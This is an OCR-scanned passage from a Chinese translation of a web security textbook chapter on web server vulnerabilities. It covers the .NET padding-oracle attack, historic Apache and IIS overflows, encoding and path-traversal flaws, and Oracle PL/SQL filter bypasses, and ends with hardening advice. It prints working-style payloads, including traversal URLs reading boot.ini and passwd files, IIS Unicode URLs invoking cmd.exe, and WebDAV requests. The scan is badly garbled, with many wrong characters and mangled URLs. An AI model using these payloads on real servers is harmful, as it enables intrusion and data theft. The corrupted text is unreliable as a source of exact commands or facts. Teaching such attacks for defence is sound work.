明文 与 称 为 初始 化 癌 量 (IV)〉 的 预 设 消息 分 组 进行 XOR 运 算 。【〈 回 顾 我 





























们 在 第 7 章 讨论 的 在 密 文 中 选择 模式 时 遇 到 的 问题 。) 如 第 7 章 所 述 ， 接 
下 来 ， 第 二 条 消息 将 与 第 一 条 消息 的 密 文 进行 XOR 运 算 ， 从 而 开始 循环 
分 组 链 。 

整个 .NET 加 密 过 程 如 下 。 

(1) 选择 明文 消息 。 

(2) 使 用 所 需 的 填充 字符 数 作为 填充 字 节 值 填 充 该 消息 。 

(3) 将 第 一 个 明文 分 组 与 初始 化 向 量 进行 XOR 运 算 。 

(4) 使 用 三 重 DES 加 密 从 第 3 步 的 XOR 运 算得 到 的 值 。 

从 这 时 开始 ， 将 循环 执行 以 下 步骤 ， 以 加 密 剩 余 的 消息 〈 这 就 是 第 
7 章 介 绍 的 密码 块 链 CCBC) 过 程 ) 。 

(5) 将 第 二 个 明文 分 组 与 加 密 后 的 前 一 个 分 组 进行 XOR 运 算 。 

(6) 使 用 三 重 DES 加 密 XOR 运 算得 到 的 值 。 

@ 填充 提示 

在 2010 年 9 月 之 前 ， 易 受 攻击 的 .NET 版 本 包含 一 个 看 似 无 害 的 信息 
泄露 漏洞 。 如 果 在 消息 中 发 现 填 充 错 误 ， 应 用 程序 会 报告 错误 ， 向 用 户 
返回 500 HTTP 啊 应 码 。 如 下 所 述 ， 组 合 利 用 PKCS#5 填 充 算法 和 CBC 的 
上 述 行为 ， 攻 击 者 可 以 攻破 整个 .NET 安 全 机 制 。 

请 注意 ， 为 了 发 挥 效 用 ， 所 有 明文 字符 串 应 包含 至 少 一 字 节 的 填充 
信息 。 此 外 还 要 注意 ， 看 到 的 第 一 个 密 文 分 组 为 初始 化 回 量 ， 该 回 量 的 
唯一 用 途 ， 是 与 消息 的 第 一 个 加 密 分 组 的 明文 值 进行 XOR 运 算 。 为 实施 
攻击 ， 攻 击 者 将 向 应 用 程序 提交 一 个 仅 包 含 前 两 个 密 文 分 组 的 字符 串 。 
这 两 个 分 组 分 别 为 IV 及 第 一 个 密 文 分 组 。 然 后 ， 攻 击 者 提交 一 个 仅 包 含 
数字 零 的 IV， 并 通过 逐步 递增 该 IV 的 最 后 一 个 字 节 ， 提 出 一 系列 请 求 。 
该 字 贡 将 与 密 文 中 的 最 后 一 个 字 节 进行 XOR 运 算 ， 除 非 针 对 该 字 节 生成 
的 值 为 0x01， 否 则 加 密 算法 将 抛 出 错误 ! (前 面 我 们 讲 过 ， 任 何 字 符 串 
的 明文 值 必须 以 一 个 或 多 个 填充 值 结尾 。 由 于 第 一 个 密 文 分 组 中 不 存在 
任何 其 他 填充 值 ， 因 此 最 后 一 个 值 必定 被 加 密 为 0x01。 ) 

攻击 者 可 以 利用 以 下 错误 条 件 一 一 最 终 他 会 得 到 这 样 的 值 : 如 果 将 
该 值 与 密 文 分 组 的 最 后 一 个 字 节 进行 XOR 运 算 ， 结 果 为 0x01。 这 时 ， 将 
可 以 确定 最 后 一 个 字 节 y 的 明文 值 ， 因 为 : 


x XOR y = 0x01 


因此 ， 我 们 也 由 此 确定 x 的 值 。 

以 上 过 程 同样 适用 于 密 文 中 的 倒数 第 二 个 字 节 。 这 次 ， 在 已 知 y 值 
的 情况 下 ， 攻 击 者 将 选择 x 的 值 〈 该 值 的 最 后 一 个 字 节 将 解密 为 
0x02) 。 然 后 ， 他 对 初始 化 向 量 中 的 倒数 第 二 个 字符 执行 以 上 递归 过 
程 ， 并 收 到 500 Internal Server Error 消 息 ， 直 到 倒数 第 二 个 解密 的 字 节 为 















































0x02。 这 时 ， 消 息 末 尾 存 在 两 个 0x02 字 节 ， 这 是 有 效 的 填充 ， 因 而 不 会 
返回 任何 错误 。 然 后 ， 可 以 对 目标 分 组 中 的 所 有 数据 位 、 随 后 的 密 文 分 
组 ， 以 及 消息 中 的 所 有 分 组 递归 应 用 同样 的 过 程 。 

这 样 ， 攻 击 者 即 可 以 解密 整 条 消息 。 有 趣 的 是 ， 攻 击 者 还 可 以 采用 
同样 的 机 制 来 加 密 消 息 。 恢 复 一 个 明文 字符 串 后 ， 就 可 以 修改 IV 来 生成 
所 选 的 明文 字符 串 。ScriptResource.axd 是 一 个 最 佳 攻 击 目标 。 
ScriptResource 的 4 参数 是 一 个 加 密 的 文件 名 。 如 果 攻 击 者 选择 web.config 
作为 文件 名 ， 将 能 够 获得 具体 的 文件 ， 因 为 ASP.NET 会 避 开 IIS 实 施 的 
有 关 文 件 处 理 方面 的 常规 限制 。 例 如 : 





https: //mdsec.net/ScriptResource. axd?d=ShXSD3uTnhyYsk4gMDsfL84_mHPCSjI71f£ 
dnrl_WtsftZivVOZ6IXYGROCKWS FUL zFO&t-632769953157700078 
r3 
= J 


O 注解 一 般 而 言 ， 以 上 攻击 适用 于 任何 使 用 PKCS #5 填充 
的 CBC 密 码 。 此 类 攻击 最 初 于 2002 年 为 人 们 所 知 ， 它 的 主要 目标 
为 .NET， 因 为 .NET 对 会 话 令 牌 、ViewState 和 ScriptResource.axd 使 
用 PKCS #5 填充 。 请 访问 
www.iacr.org/archive/eurocrypt2002/23320530/cbc02_e02d.pdf 查 阅 讨 
论 这 种 攻击 的 原始 论文 。 





从 

Cs aa 通常 ， 人 们 并 不 认真 看 待 “ 绝 不 要 公开 自己 的 加 密 算 
法 这 句 话 。 然 而 ， 第 7 章 介 绍 的 位 翻转 攻击 和 上 述 填充 提示 攻击 均 
表明 ， 任 何 微不足道 的 漏洞 都 可 能 导致 非常 可 怕 的 后 果 。 因 此 ， 绝 
不 要 公开 自己 的 加 密 算法 。 





尝试 访问 


http://mdsec.net/private/ 





由 于 攻击 者 可 以 利用 缓冲 区 溢出 控制 易 受 攻击 的 进程 ， 因 此 ， 这 种 
漏洞 是 影响 各 种 软件 的 最 严重 的 漏洞 (请 参阅 第 16 章 了 解 相关 内 容 〉。 
如 果 攻 击 者 能 够 在 Web 服 务 器 中 执行 任意 代码 ， 他 就 能 攻破 其 中 运行 的 
任何 应 用 程序 。 

下 面 仅 介绍 少数 几 种 Web 服 务 器 缓冲 区 洲 出 漏洞 ; 但 这 足以 证 明 这 
种 漏洞 的 普遍 性 ， 它 存在 于 大 量 Web 服 务 占 产品 与 组 件 中 。 

1. Apache mod_isapi 4:45 4 

2010 年 ， 人 们 发 现 了 一 个 漏洞 。 如 采 Apache 中 存在 该 漏洞 ， 在 遇 到 
错误 时 ， 系 统 将 强制 从 内 存 中 弛 载 mod_isapi。 不 过 ， 对 应 的 函数 指针 仍 
保留 在 内 存 中 ， 并 且 可 以 在 引用 相应 的 ISAPI 函 数 时 被 调用 ， 从 而 访问 
内 存 的 任意 部 分 。 

有 关 此 漏洞 的 详细 信息 ， 请 访问 : 
www.senseofsecurity.com.au/advisories/SOS-10-002。 

2. Microsoft IIS ISAPI 扩 展 

Microsoft IIS 4 与 5 包含 一 系列 默认 激活 的 ISAPI 扩 展 。2001 年 ， 人 们 
发 现 其 中 几 个 扩展 存在 缓冲 区 浇 出 漏洞 ， 包 括 Internet Printing Protocol 
扩展 与 Index Server 扩 展 。 这 些 漏 洞 使 攻击 者 能 够 在 Local System 权限 下 
执行 任意 代码 ， 进 而 完全 控制 整个 计算 机 ， 并 以 此 为 基础 传播 Nimda 与 
Code Red 蜂 虫 ， 随 后 将 它们 迅速 扩散 。 下 面 的 Microsoft TechNet 公 告 牌 
详细 说 明了 这 些 漏洞 : 

DQ www.microsoft.com/technet/security/bulletin/MS01-023.mspx; 

O www.microsoft.com/technet/security/bulletin/MS01-033.mspx. 

@ 七 年 以 后 

2008 年 ， 人 们 在 IPP 服 务 中 发 现 了 男 一 个 漏洞 。 这 次 ， 部 署 到 
Windows 2003 和 Windows 2008 上 的 大 多 数 IS 版 本 都 不 会 立即 受到 攻 














击 ， 因 为 这 些 系统 默认 禁用 该 扩展 。 请 访问 
www.microsoft.com/technet/security/bulletin/ms08-062.mspx 查 看 Microsoft 
发 布 的 相关 建议 。 

3. Apache 分 块 编 码 洲 出 

2002 年 ， 人 们 在 Apache Web 服 务 器 中 发 现 一 个 由 整数 符号 错误 导致 
的 缓冲 区 溢出 漏洞 。 存 在 漏洞 的 代码 被 重复 用 在 许多 其 他 Web 服 务 器 产 
品 中 ， 使 这 些 产品 也 受到 影响 。 详 情 请 访问 
www.securityfocus.com/bid/5033/discuss 

® 八 年 以 后 

2010 年 ， 人 们 发 现 Apache 的 mod_proxy 在 处 理 HTTP 响 应 中 的 分 块 编 
码 时 存在 整数 洪 出 。 请 访问 www.securityfocus.com/bid/37966 了 解 有 关 此 
漏洞 的 介绍 。 

4. WebDAV 汶 出 

2003 年 ， 人 们 发 现 Windows 操 作 系 统 的 一 个 核心 组 件 中 存在 缓冲 区 
溢出 漏洞 。 这 个 漏洞 可 被 各 种 攻击 问 量 利用 ， 对 许多 客户 而 言 ， 其 中 最 
重要 的 是 IS 5 内 置 的 WebpDAV 文 持 。 在 修复 之 前 ， 这 个 漏洞 曾 被 攻击 者 
广泛 利用 。 欲 知 该 漏洞 的 详情 ， 请 访问 
www. microsoft.com/technet/security/bulletin/MS03-007.mspx. 

9 七 年 以 后 

实施 WebDAV 导 致 一 系列 Web 服 务 器 出 现 漏洞 。 

2009 年 ， 人 们 发 现 Apache 的 mod_dav 扩 展 存 在 另 一 个 缓冲 区 洲 出 漏 
洞 。 欲 知 有 关 详 情 ， 请 访问 http:Wcve.mitre.org/cgi-bin/cvename.cgi? 
name=CVE-2010-1452. 

2010 年 ， 人 们 发 现 ，OPTIONS 请 求 中 的 超 长 路 径 会 导致 Sun 公 司 的 
Java System Web Server 出 现 溢出 。 有 关 此 漏洞 的 详情 ， 请 访问 
www.exploit-db.com/exploits/14287/. 














如 第 3 章 所 述 ， 我 们 可 以 使 用 各 种 编码 方案 对 不 第 见 的 字符 和 扩容 
进行 编码 ， 以 方便 通过 HTTP 安 全 传送 。 如 果 Web 应 用 程序 中 存在 几 种 
攻击 者 束 可 以 利用 这 些 编码 方案 避 开 输入 确认 检查 ， 实 施 
其 他 攻击 。 

许多 Web 服 务 占 软件 中 都 存在 编码 漏洞 ， 如 果 用 户 提 交 的 相同 数据 
被 使 用 各 种 技术 的 几 个 保护 层 处 理 ， 编 码 漏 洞 就 会 造成 严重 的 威胁 。 一 
个 典型 的 Web 请 求 可 能 被 Web 服 务 器 、 应 用 程序 平台 、 各 种 托 省 与 非 托 
管 API[、 其 他 软件 组 件 与 基础 操作 系统 处 理 。 如 果 不 同 的 组 件 以 不 同 的 








方式 执行 一 种 编码 方案 ， 或 者 对 部 分 编码 的 数据 进行 其 他 解码 或 注释 ， 
那么 攻击 者 就 可 以 利用 这 种 行为 避 开 过 滤 或 造成 其 他 反 第 行为 。 

路 径 遇 有 历 是 可 通过 规范 化 缺陷 加 以 利用 的 最 常见 漏洞 之 一 ， 因 为 它 
总 是 涉及 与 操作 系统 的 通信 。 在 第 10 章 中 ， 我 们 介绍 了 Web 应 用 程序 中 
的 路 径 壳 历 漏洞 。 各 种 Web 服 务 器 软件 中 也 可 能 存在 这 种 类 型 的 漏洞 ， 
导致 攻击 者 能 够 读 取 或 写 入 Web 根 目录 以 外 的 任何 文件 。 

1. Apple iDisk Server i$ (21H 4 

Apple iDisk Server 是 一 项 流行 的 云 同步 存 储 服 务 。2009 年 ，Jeremy 
Richards 友 现 其 易于 受到 路 径 过 历 攻 击 。 

iDisk 用 户 的 目录 结构 中 包含 一 个 公共 目录 ， 该 目录 的 内 容 可 由 未 授 
权 的 互联 网 用 户 访问 。Richards 发 现 ， 通 过 使 用 Unicode 字 符 从 该 公共 文 
li 即 可 从 用 户 的 iDisk 的 私有 部 分 获取 任意 内 

HR TAB: 


http: //idgisk.mac.com/Jeremy.richards-Public/*22¢2E$2PPRIVATE.txt?disposition= 

















down] 


此 外 ， 还 可 以 首先 提出 WebDAV PROPFINDHRAEPIMIDIKIN HN 


POST /Jeremy.richards-Public/<strong>¢$2E%2E¢2 rong> ?webdav tho 


PROPF ID 


2. Ruby WEBrick Web 服 务 器 
和 
服务 器 易于 受到 以 下 简单 形式 的 遍历 攻击 : 


http: // [server]: [port]/..%5c. .%5ec. .35c. .85c. . 5c. . 5c. .%5c. .%5c. .85c/boot. ini 


亿 知 该 漏洞 的 详情 ， pe 

3. Java Web 4 48 HKJ 

此 路 径 过 历 漏 洞 源 于 JVM 并 不 解码 UTF-8 这 一 事实 。Tomcat 即 是 一 
种 以 Java 编 写 并 使 用 易 受 攻击 的 JVM 版 本 的 Web 服 务 器 。 使 用 UTF-8 编 
码 的 ../ 序 列 可 从 中 检索 任意 内 容 : 


htto://www.targetl.com/%c0taetcOtae/tcOtaetc0 tae/4tc0taetcostae/ etc/oasswa 


ro 

4. Allaire JRun 目 录 列 表 漏 洞 

2001 年 ， 人 们 在 Allaire JRun 中 发 现 一 个 漏洞 ， 即 使 目录 中 包含 
index.html 之 类 的 默认 文件 ， 攻 击 者 仍然 可 以 利用 这 个 漏洞 获取 目录 列 
表 。 攻 击 者 可 以 使 用 以 下 形式 的 URL 获 取 目 录 列 表 : 








https://wahh-app.com/dir/%3f.jsp 








%3f 是 问号 的 URL 编 码 形式 ， 它 常用 在 查询 字符 串 的 开始 部 分 。 漏 
洞 之 所 以 产生 ， 是 因为 最 初 URL 解 析 器 并 未 将 %3f 解 释 为 查询 字符 串 指 
示 符 。 因 此 ， 服 务 器 认为 URL 以 .jsp 结 尾 ， 将 请 求 提交 给 负责 JSP 文 件 请 
求 的 组 件 处 理 。 然 后 ， 这 个 组 件 对 %3f 进 行 解码 ， 把 它 解释 为 查询 字符 
串 的 开始 部 分 ， 并 发 现 得 到 的 基础 URL 不 是 一 个 JSP 文 件 ， 于 是 它 返回 
Ax. ARTE, WW le] www.securityfocus.com/bid/3592. 

© 八 年 以 后 

2009 年 ， 人 们 发 现 ， 在 目录 名 以 问号 结尾 时 ，Jetty 中 存在 一 个 目录 
志 历 相关 的 类 似 低 风 险 漏 洞 。 要 解决 此 漏洞 ， 需 要 将 ?编码 为 %3f。 铭 
知 详情 ， 请 访问 https://www.kb.cert.org/vuls/id/402580。 

5. Microsoft IIS Unicode 路 径 人 遍历 漏洞 

Microsoft IIS 服 务 器 中 的 两 个 相关 漏洞 分 别 于 2000 年 与 2001 年 被 发 
现 。 为 防止 路 径 遇 历 攻击 ，IIS 在 包含 点 一 点 一 斜 线 序列 的 请 求 中 查找 
它 的 字面 量 与 URL 编 码 形式 。 如 果 某 个 请 求 中 没有 这 些 表达 式 ，IIS 服 
务 器 就 会 接受 这 个 请 求 ， 然 后 做 进一步 处 理 。 但 是 ， 接 下 来 ， 服 务 器 对 
被 请 求 的 URL 进 行 了 额外 的 规范 化 处 理 ， 使 得 攻击 者 能 够 避 开 过 小 ， 让 
服务 器 处 理 遍 历 序列 。 

在 第 一 个 漏洞 中 ， 攻 击 者 可 以 提交 点 一 点 一 斜 线 序列 的 各 种 非法 
Unicode 编 码 形式 ， 如 ..%c0%af。 这 个 表达 式 与 1S 的 前 沿 过 滤器 
upfront filter) 并 不 匹配 ， 但 随后 的 处 理 过 程 接受 这 种 非法 编码 ， 并 将 
它 转换 成 一 个 字面 量 过 有 历 序 列 。 这 使 攻击 者 能 够 侵入 Web 根 目录 以 外 的 
目录 ， 并 使 用 下 面 的 URL 执 行 任意 命令 : 























w app.com/scripts/..$cO%af..%cOtak. .ScO%af. .tcOt¢al. .tcOtaf../ 


dir-+c:\ 


在 第 二 个 漏洞 中 ， 攻 击 者 可 以 提交 点 一 点 一 和 斜 线 序 列 的 双重 编码 形 
式 ， 如 ..%255c。 同 样 ， 这 个 表达 式 也 与 IS 的 过 滤器 不 相 匹配 ， 但 随后 
的 处 理 过 程 对 输入 进行 “过 剩 解 码 ”(superfluous decode) ， 因 而 将 其 转 
这 样 ， 攻 击 者 就 可 以 使 用 下 面 的 URL 实 施 男 
— WI : 


https://wahh-app.com/scripts/..%255c..%255c,.%255c..%255c..%2550.. 


winnt/systemł2/cmd. e 








$25Scwinnt/system32/cemd.exe?/c+dir-c: \ 
欲 知 这 些 漏洞 的 详情 ， 请 访问 : 
口 www.microsoft.comytechnet/securitybulletin/MS00-078.mspx 
口 www.microsoft.comytechnet/securitybulletin/MS01-026.mspx 
© LF Wa 
2009 年 ， 人 们 又 在 WebDAV 中 发 现 类 似 的 IIS 漏 洞 ， 这 说 明 Web 服 务 





器 软件 中 的 编码 与 规范 化 漏洞 始终 是 一 个 安全 隐患 。 受 IIS 保 护 的 文件 
可 以 通过 在 URL 中 插入 恶意 %c0%af 字 符 串 进行 下 载 。 
由 于 以 下 请 求 看 起 来 并 不 是 一 个 针对 受 保护 文件 的 请 求 ，ISS 会 授 
权 其 访问 相关 资源 的 权限 ， 但 恶意 字符 串 随后 会 从 请 求 中 删除 : 
GET /prote%c0%afcted/protected.zip HTTP/1.1 
Translate: f 








Connection: close 
Host: wahh-app.net 


Translate: f 消 息 头 用 于 确保 该 请 求 会 由 WebDAV 扩 展 处理 。 使 用 以 
下 代码 可 以 在 WebDAV 请 求 中 直接 实施 相同 的 攻击 : 


PROPFIND /protec%c0%afted/ HTTP/1.1 
Host: wahh-app.net 

User-Agent: neo/0.12.2 

Connection: TE 











TE: trailers 

Depth: 1 

Content-Length: 288 

Content-Type: application/xml 

<?xml version="1.0" encoding="ut£-8"?> 
<propfind xmlns="DAV:"><prop> 
<getcontentlength xmlns="DAV:"/> 
<getlastmodified xmlns="DAV:"/> 
<executable xmlns="http://apache.org/dav/props/"/> 
<resourcetype xmlns="DAV:"/> 
<checked-in xmlns="DAV:"/> 
<checked-out xmlns="DAV:"/> 
</prop></propfind> 


欲 知 详情 ， 请 访问 www.securityfocus.comy/bid/34993/。 

6. i Ff Oracle PL/SQL 排 除 列 表 

前 面 我 们 提 到 ， 可 通过 Oracle 的 PL/SQL 网 关 访 问 和 危险 默认 功能 。 为 
解决 这 个 问题 ，Oracle 创 建 了 PL/SQL 排 除 列表 (Exclusion List) ， 它 阻 
止 攻击 者 访问 以 某 些 表达 式 〈 如 OWA 与 SYS) 开头 的 包 。 

2001 一 2007 年 以 来 ，David Litchfield 发 现 了 一 系列 避 开 PL/SQL 排 除 
列表 的 方法 。 在 第 一 个 漏洞 中 ， 在 包 名 称 前 插入 空白 符 《〈 如 换行 符 、 罕 








格 或 制 表 符 ) 即 可 避 开 过 滤 。 例 如 : 
https://wahh-app.com/pls/dad/%0ASYS .Package.pProcedure 


过 滤 ， 由 于 后 端 数据 库 忽略 空白 符 ， 因 此 和 危险 的 包 得 以 
MAT 
在 第 二 个 漏洞 中 ， 用 代表 字符 y 的 9%FF 蔡 代 字 母 Y， 即 可 避 开 过 滤 : 
https: //wahh-app.com/pls/dad/S*FFS.package. procedure 

这 个 URL 可 避 开 过 滤 ， 后 端 数据 库 对 字符 进行 规范 化 处 理 ， 将 其 恢复 到 
标准 的 字母 Y， 从 而 调用 危险 的 包 。 

在 第 三 个 漏洞 中 ， 用 双 引 号 包含 一 个 被 阻止 的 表达 式 即 可 避 开 过 
Ve: 








https: //wahh-app.com/pls/dad/"SYS" .package. orocedure 
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在 第 四 个 漏洞 中 ， 使 用 尖 括 号 在 被 阻止 的 表达 式 前 放置 一 个 编程 的 
goto 标 签 ， 即 可 避 开 过 小 : 


https: //wahh-app.com/pls/dad/<<FOO>>SYS.package.procedure 


这 个 URL 可 避 开 过 滤 ， 后 端 数据 库 忽 上 略 goto 标 签 ， 使 得 危险 的 包 得 以 执 


行 。 

由 于 前 端 过 滤 由 一 个 组 件 根 据 简 单 的 文本 模式 匹配 执行 ， 而 随后 的 
处 理 过 程 却 由 男 一 个 组 件 执行 ， 并 且 它 们 按照 自己 的 规则 解释 输入 的 句 
法 与 语法 意义 ， 因 而 造成 了 以 上 各 种 漏洞 。 这 两 组 规则 之 间 的 任何 差异 
都 可 能 会 被 攻击 者 利用 ， 提 区 与 过 滤器 所 使 用 的 模式 不 相 匹 配 的 输入 ， 
但 数据 库 却 按 攻 击 者 币 理 的 方式 解释 这 个 输入 ， 调用 危险 的 包 。 由 于 
Oracle 数 据 库 的 功能 极其 强大 ， 因 而 这 种 差异 大 量 存 在 。 

欲 知 这 些 漏洞 的 详情 ， 请 访问 : 

D www.securityfocus.com/archive/1/423819/100/0/threaded 

口 The Oracle Hacker's Handbook， 作 者 David Litchfield (Wiley; 
2007) 

9 七 年 以 后 

2008 年 ， 人 们 在 Portal Server (Oracle Application Server 的 一 部 分 ) 
中 发 现 一 个 漏洞 : 如 果 攻 击 者 具有 以 %0A 结 尾 的 会 话 ID cookiei, min 

















以 避 开 “基本 验证 ”检查 。 








如 果 运 气 不 错 的 话 ， 有 的 渗透 测试 员 会 在 所 针对 的 Web 服 务 器 中 找 
到 本 章 描述 的 一 些 漏洞 。 然 而 ， 它 们 很 可 能 已 经 升级 到 了 最 新 的 版 本 ， 
渗透 测试 员 需 要 得 找 一 些 当前 或 最 新 的 漏洞 ， 利 用 它们 攻击 服务 右 。 

在 Web 服 务 占 等 非 定制 产品 中 仁 找 漏洞 时 ， 使 用 自动 化 扫 摘 工具 是 
一 个 不 错 的 起 点 。 与 Web 应 用 程序 这 些 定制 产品 不 同 ， 几 乎 所 有 的 Web 
服务 器 都 使 用 第 三 方 软件 ， 并 且 有 无 数 用 户 已 经 以 相同 的 方式 安装 和 配 
置 了 这 些 软件 。 在 这 种 情况 下 ， 使 用 自动 化 扫描 器 发 送 大 量 专门 设计 的 
请 求 并 监控 表示 已 知 漏洞 的 签名 ， 就 可 以 迅速 、 高 效 地 确定 最 明显 的 漏 
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除 使 用 扫描 工具 外 ， 渗 透 测试 员 还 应 始终 对 所 攻击 的 软件 进行 深入 
研究 。 同 时 ， 浏 览 Security Focus、OSVDB、 邮 件 列 表 Bugtraq 和 Full 
Disclosure 等 资源 ， 在 目标 软件 上 查找 所 有 最 近 发 现 的 、 尚 未 修复 的 漏 
洞 信息 。 同 时 ， 别 忘记 查看 Exploit Database 和 Metasploit， 看 看 是 不 是 有 
TE TMi Ble: SEE eh eared 
尔 : 

口 www.exploit-db.com 

口 www.metasploit.com/ 

D www.grok.org.uk/full-disclosure/ 

O http://osvdb.org/search/advsearch 

还 要 注意 ， 一 些 Web 应 用 程序 产品 中 内 置 了 开源 Web 服 务 器 ， 如 
Apache 或 Jetty。 因 为 管理 员 把 服务 器 看 作 他 们 所 安装 的 应 用 程序 ， 而 不 
是 他 们 负责 的 基础 架构 的 一 部 分 ， 所 以 这 些 捆 绑 服 务 占 的 安全 更 新 也 应 
用 得 相对 较为 缓慢。 而 且 ， 在 这 种 情况 下 ， 标 准 的 服务 标题 也 已 被 修 
改 。 因 此 ， 对 所 针对 的 软件 进行 手动 测试 与 研究 ， 可 以 非常 有 效 地 确定 
目 动 化 扫描 工具 无 法 发 现 的 漏洞 。 

如 有 可 能 ， 渗 透 测试 员 应 该 考虑 在 本 地 安装 所 攻击 的 软件 ， 并 自己 
进行 测试 ， 查 找 任何 尚未 发 现 的 新 漏洞 或 广泛 流传 的 漏洞 。 


18.2.5 章 Web 服 务 器 软件 的 安 






































从 某 种 程度 上 讲 ， 部 署 第 三 方 Web 服 务 器 产品 的 组 织 的 命运 掌握 在 
软件 供应 商 手 中 。 然 而 ， 具 有 安全 意识 的 组 织 仍然 可 以 采取 大 量 有 用 的 
彰 施 保护 目 己 ， 避 开本 章 描 述 的 各 种 软件 漏洞 。 

1. 选择 记录 良好 的 软件 

并 非 所 有 软件 产品 与 供应 商都 提供 同等 优 恨 的 服务 。 分 析 几 种 不 同 
的 服务 器 产品 的 最 近 历 史 可 以 发 现 ， 它 们 在 存在 的 严重 漏洞 数量 、 供 应 














商 修复 这 些 漏 洞 是 否 及 时 以 及 发 布 的 补丁 在 随后 测试 过 程 中 表现 的 适应 
性 等 方面 存在 明显 的 差异 。 在 选择 部 普 何 种 web 服务 器 软件 之 前 ， 应 该 
研究 这 些 差 异 ， 并 考虑 如 果 所 在 的 组 织 采 用 了 选择 的 软件 ， 它 在 近 几 年 
将 会 如 何 运 转 。 

2. 应 用 供应 商 发 布 的 补丁 

任何 有 贡 任 的 软件 供应 商 必 须 定期 发 布 安 全 更 新 。 有 时 ， 这 些 补丁 
能 够 解决 供应 丙 自 身 在 内 部 发 现 的 问题 ;其 他 情况 下 ， 软 件 问 题 由 专门 
的 研究 员 上 报 ， 但 我 们 无 法 确定 他 是 否 保留 了 一 些 信息 。 其 他 漏洞 因为 
被 攻击 者 广泛 利用 ， 因 而 引起 供应 丙 的 注意 。 但 是 ， 无 论 是 上 述 哪 一 种 
情况 ， 一 旦 供应 商 发 布 补 丁 ， 任 何 强大 的 逆 回 工程 方法 都 能 立即 查 明 它 
所 解决 的 问题 所 在 ， 使 攻击 者 能 够 着 手 设 计 利用 这 个 问题 的 攻击 。 
此 ， 如 果 可 行 ， 应 尽 可 能 及 时 地 应 用 安全 补丁 。 

3. 实施 安全 强化 

大 多 数 Web 服 务 器 都 拥有 大 量 的 配置 选项 ， 可 控制 在 其 中 激活 哪些 
功能 ， 同 时 控制 它们 的 运行 状态 。 如 果 无 用 的 功能 (如 默认 ISAPI 扩 
E) 仍然 被 激活 ， 那 么 只 要 攻击 者 在 这 项 功能 中 发 现 新 的 漏洞 ， 服 务 器 
就 会 受到 严重 的 攻击 威胁 。 用 户 应 该 查阅 与 所 使 用 的 软件 有 关 的 强化 指 
南 ， 同 时 还 应 考虑 采用 以 下 这 些 音 用 的 强化 步骤 。 

口 茶 用 任何 不 需要 的 内 置 功 能 ， 配 置 剩 下 的 功能 尽 可 能 严格 地 运 
行 ， 与 商业 需求 保持 一 致 。 这 包括 删除 映射 的 文件 扩展 名 、Web 服 务 器 
模块 和 数据 库 组 件 。 可 以 使 用 IIS Lockdown 等 工具 迅速 完成 这 项 任务 。 

口 如 果 应 用 程序 由 任何 其 他 以 本 地 代码 开发 的 定制 服务 器 扩展 组 
成 ， 则 应 考虑 是 否 可 以 使 用 托管 代码 重新 编写 这 些 扩 展 。 如 果 不 能 ， 则 
应 确保 托管 代码 环境 先 执 行 其 他 箱 入 确认 ， 然后 再 将 输入 传递 给 这 些 功 
能 。 

口 可 以 对 需要 保留 的 许多 功能 与 资源 进行 重合 名， 以 防止 攻击 者 利 
用 它们 实施 另 一 层 障碍 。 即 使 技术 熟练 的 攻击 者 仍然 能 够 发 现 重 命名 后 
的 名 称 ， 但 这 种 模糊 处 理 可 以 阻止 攻击 者 新 手 与 自动 化 蠕虫 。 

口 在 整个 技术 栈 中 应 用 最 低 权 限 原则 。 例 如 ， 应 配置 Web 服 务 器 进 
程 使 用 最 低 权 限 的 操作 系统 账户 。 还 可 以 在 UNIX 系 统 上 使 用 chroot 环 境 
进一步 限制 任何 攻击 的 影响 范围 。 

4. 监控 新 的 漏洞 

应 指派 一 名 组 织 职员 负责 监控 Bugtraq 与 Full Disclosure 等 资源 ， 碍 
找 与 所 使 用 的 软件 中 新 发 现 的 漏洞 有 关 的 公告 与 讨论 。 还 可 以 预订 各 种 
私人 服务 ， 由 他 们 提供 软件 中 已 经 发 现 但 尚未 公开 拔 露 的 最 新 漏洞 通 
知 。 通 和 常 ， 如 果 了 解 与 某 个 漏洞 有 关 的 技术 细节 ， 就 可 以 在 供应 商 发 布 
完整 的 补丁 前 ， 有 效 地 修改 这 个 漏洞 。 






































5. 使 用 深层 防御 

应 该 始终 实施 几 层 保护 ， 减 轻 基础 染 构 组 件 中 的 任何 安全 违反 造成 
的 影响 。 可 以 采取 各 种 措施 ， 将 针对 Web 服 务 器 的 成 功 攻击 的 影响 限制 
在 局 部 范围 内 。 即 使 web 服务 喜 航 完全 攻破 ， 这 些 措施 也 让 用 户 有 足够 
的 时 间 防 止 任何 严重 的 数据 泄露 。 

口 可 以 限制 Web 服 务 器 访问 其 他 目 治 的 应 用 程序 组 件 。 例 如 ， 应 只 
允许 应 用 程序 使 用 的 数据 库 账户 INSERT 访 问 用 于 保存 审计 日 志 的 表 ; 
| 
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口 可 以 对 进出 Web 服 务 需 的 流量 实施 严格 的 网 络 级 过 滤 。 

口 可 以 使 用 一 个 入 侵 检 测 系统 确定 任何 表明 发 生 安全 违反 的 反 各 网 
络 活动 。 攻 破 Web 服 务 器 后 ， 许 多 攻击 者 会 立即 尝试 建立 反问 连接 ， 侵 
入 因特网 ， 或 者 扫 描 DMZ 网 络 中 的 其 他 主机 。 高 效 的 入 侵 检测 系统 将 
实时 通知 这 些 事件 ， 以 便 用 户 采 取 措 施 阻止 攻击 。 

















许多 应 用 程序 都 受到 某 种 外 部 组 件 的 保护 ， 这 些 组 件 或 者 位 于 应 用 
程序 所 在 的 同一 主机 上 ， 或 者 位 于 基于 网 络 的 设备 上 ; 它们 要 么 执行 入 
侵 防御 《〈 应 用 程序 防火 场 ) ， 要 么 执行 入 侵 检测 (如 传统 的 入 侵 检 测 系 
R) 。 由 于 这 类 设备 用 于 确定 攻击 的 方法 基本 类 似 ， 因 此 ， 我 们 将 把 它 
们 当做 同一 类 设备 看 待 。 虽 然 许 多 人 认为 安装 这 类 设备 总 比 什么 都 不 做 
要 强 ， 但 是 ， 许 多 时 候 ， 它 们 会 造成 一 种 错误 的 安全 意识 ， 人 们 觉得 : 
既然 实施 了 男 一 层 防 御 ， 安 全 状况 将 会 自动 改善 。 虽 然 此 类 系统 并 不 会 
降低 安全 防御 ， 并 且 可 以 阻止 目标 明确 的 攻击 (如 因特网 蠕虫 ) ， 但 在 
许多 情况 下 ， 它 并 不 像 人 们 认为 的 那样 能 够 显著 改善 安全 状况 。 

值得 注意 的 是 ， 除 非 此 类 防御 设备 采用 大 量 定制 规则 ， 人 否则 它们 并 
